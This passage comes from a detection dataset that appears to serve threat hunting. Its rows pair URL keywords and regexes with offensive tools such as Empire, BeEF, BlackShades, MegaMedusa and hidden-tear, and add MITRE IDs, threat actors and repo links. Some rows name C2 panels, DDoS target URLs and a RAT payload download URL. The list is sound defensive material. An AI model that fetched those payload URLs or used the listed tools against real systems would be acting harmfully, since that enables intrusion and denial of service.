Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","1","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","47451" "*http://blog.sevagas.com/?My-VBA-Bot*",".{0,1000}http\:\/\/blog\.sevagas\.com\/\?My\-VBA\-Bot.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","1","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","47452" "*http://bshades.eu*",".{0,1000}http\:\/\/bshades\.eu.{0,1000}","offensive_tool_keyword","BlackShades","remote access trojan (RAT) used by attackers to gain unauthorized control over a victim's computer","T1012 - T1059.001 - T1071.001 - T1105 - T1113 - T1125","TA0003 - TA0005 - TA0008 - TA0010 - TA0011","N/A","N/A","Malware","https://github.com/yuankong666/Ultimate-RAT-Collection/tree/main/BlackShades","1","1","N/A","N/A","10","10","2468","431","2025-04-15T16:14:10Z","2023-09-12T00:41:11Z","47454" "*http://ec2-52-90-251-67.compute-1.amazonaws.com/GoogleChromeAutoLaunch.exe*",".{0,1000}http\:\/\/ec2\-52\-90\-251\-67\.compute\-1\.amazonaws\.com\/GoogleChromeAutoLaunch\.exe.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - 
TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","1","N/A","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","47459" "*http://go.mail.ru/search?gay.ru.query=1&q=?abc.r&q=*",".{0,1000}http\:\/\/go\.mail\.ru\/search\?gay\.ru\.query\=1\&q\=\?abc\.r\&q\=.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","1","N/A","N/A","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","47464" "*http://hashcrack.com*",".{0,1000}http\:\/\/hashcrack\.com.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","47465" "*http://hashtoolkit.com*",".{0,1000}http\:\/\/hashtoolkit\.com.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","47466" "*http://king-hrdevil.rhcloud.com/f5ddos3.html?v=*",".{0,1000}http\:\/\/king\-hrdevil\.rhcloud\.com\/f5ddos3\.html\?v\=.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","1","N/A","N/A","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","47467" "*http://knight*.onion*",".{0,1000}http\:\/\/knight.{0,1000}\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","ransomware note from knight ransomware","T1486","TA0040","N/A","N/A","Ransomware","https://tria.ge/230901-c2fbqacb36","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","47468" 
"*http://LhOsT/FiLNaMe.*",".{0,1000}http\:\/\/LhOsT\/FiLNaMe\..{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","47469" "*http://localhost/shell.jsp?pwd=System.out.println(*",".{0,1000}http\:\/\/localhost\/shell\.jsp\?pwd\=System\.out\.println\(.{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","1","N/A","N/A","10","7","630","150","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z","47470" "*http://localhost/stager.php*",".{0,1000}http\:\/\/localhost\/stager\.php.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - 
BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","47471" "*http://localhost:3000/ui/panel*",".{0,1000}http\:\/\/localhost\:3000\/ui\/panel.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","47474" "*http://localhost:42969/easy.aspx*",".{0,1000}http\:\/\/localhost\:42969\/easy\.aspx.{0,1000}","offensive_tool_keyword","chunk-Proxy","A backdoor installed on a web server that allows for the execution of commands and facilitates persistent access.","T1505.003 - T1059 - T1105 - T1071","TA0011 - TA0002 - TA0003","Ghost Ransomware","N/A","C2","https://github.com/BeichenDream/Chunk-Proxy","1","1","N/A","N/A","10","10","283","40","2022-05-07T04:24:50Z","2021-10-28T18:45:21Z","47475" "*http://localhost:4430/hello*",".{0,1000}http\:\/\/localhost\:4430\/hello.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","1","N/A","N/A","9","","N/A","","","","47476" "*http://localhost:52935*",".{0,1000}http\:\/\/localhost\:52935.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 
(Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP - C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","1","N/A","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","47477" "*http://localhost:58082/broadcast?id=*",".{0,1000}http\:\/\/localhost\:58082\/broadcast\?id\=.{0,1000}","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","1","N/A","N/A","10","5","487","51","2024-11-21T17:36:55Z","2023-08-02T14:30:41Z","47478" "*http://localhost:7474/browser/*",".{0,1000}http\:\/\/localhost\:7474\/browser\/.{0,1000}","offensive_tool_keyword","BloodHound","A Python based ingestor for BloodHound","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/fox-it/BloodHound.py","1","1","N/A","neo4j default local url","10","10","2088","343","2025-03-28T11:19:13Z","2018-02-26T14:44:20Z","47479" "*http://localhost:80/bcsjngnk*",".{0,1000}http\:\/\/localhost\:80\/bcsjngnk.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 
- T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","47482" "*http://localhost:8000/emailviewer.html*",".{0,1000}http\:\/\/localhost\:8000\/emailviewer\.html.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","1","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","47483" "*http://localhost:8118*",".{0,1000}http\:\/\/localhost\:8118.{0,1000}","offensive_tool_keyword","CursedChrome","Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies allowing you to browse sites as your victims","T1176 - T1219 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/mandatoryprogrammer/CursedChrome","1","1","N/A","privproxy port also web panel for 
victims","10","10","1533","226","2024-10-26T19:06:54Z","2020-04-26T20:55:05Z","47484" "*http://localhost:9090/*",".{0,1000}http\:\/\/localhost\:9090\/.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","47485" "*http://localhost:9999/portal*",".{0,1000}http\:\/\/localhost\:9999\/portal.{0,1000}","offensive_tool_keyword","pac2","PAC2 is a framework that generates arbitrary flows and sends and executes them on the Power Automate Platform - using Power automate as a C2","T1550.001 - T1204.002 - T1102 - T1071.001","TA0005 - TA0008 - TA0010- TA0011","N/A","N/A","C2","https://github.com/NTT-Security-Japan/pac2","1","1","N/A","N/A","6","10","6","1","2024-04-16T11:58:54Z","2024-03-01T08:06:32Z","47486" "*http://louis-ddosvn.rhcloud.com/f5.html?v=*",".{0,1000}http\:\/\/louis\-ddosvn\.rhcloud\.com\/f5\.html\?v\=.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - 
T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","1","N/A","N/A","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","47488" "*http://md5.80p.cn*",".{0,1000}http\:\/\/md5\.80p\.cn.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","47489" "*http://md5.gongjuji.net*",".{0,1000}http\:\/\/md5\.gongjuji\.net.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","47490" "*http://md5.gromweb.com*",".{0,1000}http\:\/\/md5\.gromweb\.com.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","47491" "*http://md5.my-addr.com*",".{0,1000}http\:\/\/md5\.my\-addr\.com.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","47492" "*http://md5.tellyou.top*",".{0,1000}http\:\/\/md5\.tellyou\.top.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","47493" 
"*http://mirror.archlinux.no*",".{0,1000}http\:\/\/mirror\.archlinux\.no.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","47494" "*http://nemesis/file*",".{0,1000}http\:\/\/nemesis\/file.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","47495" "*http://nemesis/yara*",".{0,1000}http\:\/\/nemesis\/yara.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","47496" "*http://nemesis-es-http.default.svc.cluster.local:9200*",".{0,1000}http\:\/\/nemesis\-es\-http\.default\.svc\.cluster\.local\:9200.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","47497" "*http://nemesis-es-internal-http:9200*",".{0,1000}http\:\/\/nemesis\-es\-internal\-http\:9200.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","47498" 
"*http://nemesis-kb-http.default.svc.cluster.local:5601*",".{0,1000}http\:\/\/nemesis\-kb\-http\.default\.svc\.cluster\.local\:5601.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","47499" "*http://nemesis-kb-http:5601*",".{0,1000}http\:\/\/nemesis\-kb\-http\:5601.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","47500" "*http://nova.rambler.ru/search?btnG=%D0%9D%?D0%B0%D0%B&q=*",".{0,1000}http\:\/\/nova\.rambler\.ru\/search\?btnG\=\%D0\%9D\%\?D0\%B0\%D0\%B\&q\=.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","1","N/A","N/A","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","47501" "*http://page-xirusteam.rhcloud.com/f5ddos3.html?v=*",".{0,1000}http\:\/\/page\-xirusteam\.rhcloud\.com\/f5ddos3\.html\?v\=.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","1","N/A","N/A","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","47502" "*http://php-hrdevil.rhcloud.com/f5ddos3.html?v=*",".{0,1000}http\:\/\/php\-hrdevil\.rhcloud\.com\/f5ddos3\.html\?v\=.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - 
T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","1","N/A","N/A","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","47505" "*http://rainbowtables.it64.com*",".{0,1000}http\:\/\/rainbowtables\.it64\.com.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","47506" "*http://shell:7681/token*",".{0,1000}http\:\/\/shell\:7681\/token.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","N/A","10","10","1561","196","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z","47511" "*http://sniff.su/*.gz*",".{0,1000}http\:\/\/sniff\.su\/.{0,1000}\.gz.{0,1000}","offensive_tool_keyword","Intercepter-NG","android wifi sniffer","T1433","TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/intercepter-ng","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","47512" "*http://sniff.su/*.zip*",".{0,1000}http\:\/\/sniff\.su\/.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","Intercepter-NG","android wifi sniffer","T1433","TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/intercepter-ng","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","47513" "*http://sourceforge.net/projects/adzok/files/Adzok_Open_v1.0.0.2.jar/download*",".{0,1000}http\:\/\/sourceforge\.net\/projects\/adzok\/files\/Adzok_Open_v1\.0\.0\.2\.jar\/download.{0,1000}","offensive_tool_keyword","Adzok","RAT tool - a variant of Adwind abused by TA","T1219 - T1105 - T1027 - T1059 - T1204","TA0011 - TA0005 - TA0002 - 
TA0008","N/A","Packrat","Malware","https://sourceforge.net/projects/adzok/files/Adzok_Open_v1.0.0.2.jar/download","1","1","N/A","N/A","8","8","N/A","N/A","N/A","N/A","47514" "*http://tarantula.by.ru/localroot/*",".{0,1000}http\:\/\/tarantula\.by\.ru\/localroot\/.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","47516" "*http://tarantula.by.ru/localroot/2.6.x/h00lyshit*",".{0,1000}http\:\/\/tarantula\.by\.ru\/localroot\/2\.6\.x\/h00lyshit.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","47517" "*http://tor2web.*","http\:\/\/tor2web\..{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","47520" "*http://ttmd5.com*",".{0,1000}http\:\/\/ttmd5\.com.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","47521" "*http://utkusen.com/hidden-tear/*",".{0,1000}http\:\/\/utkusen\.com\/hidden\-tear\/.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - 
T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","1","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","47524" "*http://vpsip:28888*",".{0,1000}http\:\/\/vpsip\:28888.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","N/A","10","","N/A","","","","47525" "*http://wfuzz.org*",".{0,1000}http\:\/\/wfuzz\.org.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","47526" "*http://www.ampliasecurity.com/research/wcefaq.html*",".{0,1000}http\:\/\/www\.ampliasecurity\.com\/research\/wcefaq\.html.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","1","N/A","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","47528" "*http://www.chamd5.org/*",".{0,1000}http\:\/\/www\.chamd5\.org\/.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential 
Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","47529" "*http://www.dmd5.com*",".{0,1000}http\:\/\/www\.dmd5\.com.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","47530" "*http://www.exploit-db.com/exploits/*",".{0,1000}http\:\/\/www\.exploit\-db\.com\/exploits\/.{0,1000}","offensive_tool_keyword","linuxprivchecker","search for common privilege escalation vectors such as world writable files. misconfigurations. clear-text passwords and applicable exploits","T1210.001 - T1082 - T1088 - T1547.001","TA0002 - TA0004 - TA0006 - TA0007 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py","1","1","N/A","N/A","7","10","1645","524","2022-01-31T10:32:08Z","2016-04-19T13:31:46Z","47533" "*http://www.gmer.net/#files*",".{0,1000}http\:\/\/www\.gmer\.net\/\#files.{0,1000}","offensive_tool_keyword","gmer","rootkit detector abused by attackers to disable security software","T1014 - T1562.001","TA0005","N/A","BlackSuit - Royal - PLAY - LockBit - Bassterlord* - Conti - 8BASE - TargetCompany - Hive - Avaddon","Defense Evasion","gmer.net","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","47534" "*http://www.insecam.org/en/jsoncountries/*",".{0,1000}http\:\/\/www\.insecam\.org\/en\/jsoncountries\/.{0,1000}","offensive_tool_keyword","Cam-Hackers","Hack Cameras CCTV FREE","T1125","TA0007","N/A","N/A","Discovery","https://github.com/AngelSecurityTeam/Cam-Hackers","1","1","N/A","N/A","6","10","2025","512","2024-08-06T18:49:02Z","2019-11-16T18:49:35Z","47535" 
"*http://www.md5cracker.com*",".{0,1000}http\:\/\/www\.md5cracker\.com.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","47536" "*http://www.nirsoft.net/password_test*",".{0,1000}http\:\/\/www\.nirsoft\.net\/password_test.{0,1000}","offensive_tool_keyword","SniffPass","password monitoring software that listens to your network - capture the passwords that pass through your network adapter and display them on the screen instantly","T1040 - T1071 - T1041","TA0006 - TA0007 - TA0009","N/A","GoGoogle - Kimsuky","Credential Access","https://www.nirsoft.net/utils/password_sniffer.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","47537" "*http://www.site.com/article.php?id=1*",".{0,1000}http\:\/\/www\.site\.com\/article\.php\?id\=1.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","N/A","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","47540" "*http://www.site.com/vuln.php?id=1 --dbs*",".{0,1000}http\:\/\/www\.site\.com\/vuln\.php\?id\=1\s\-\-dbs.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & 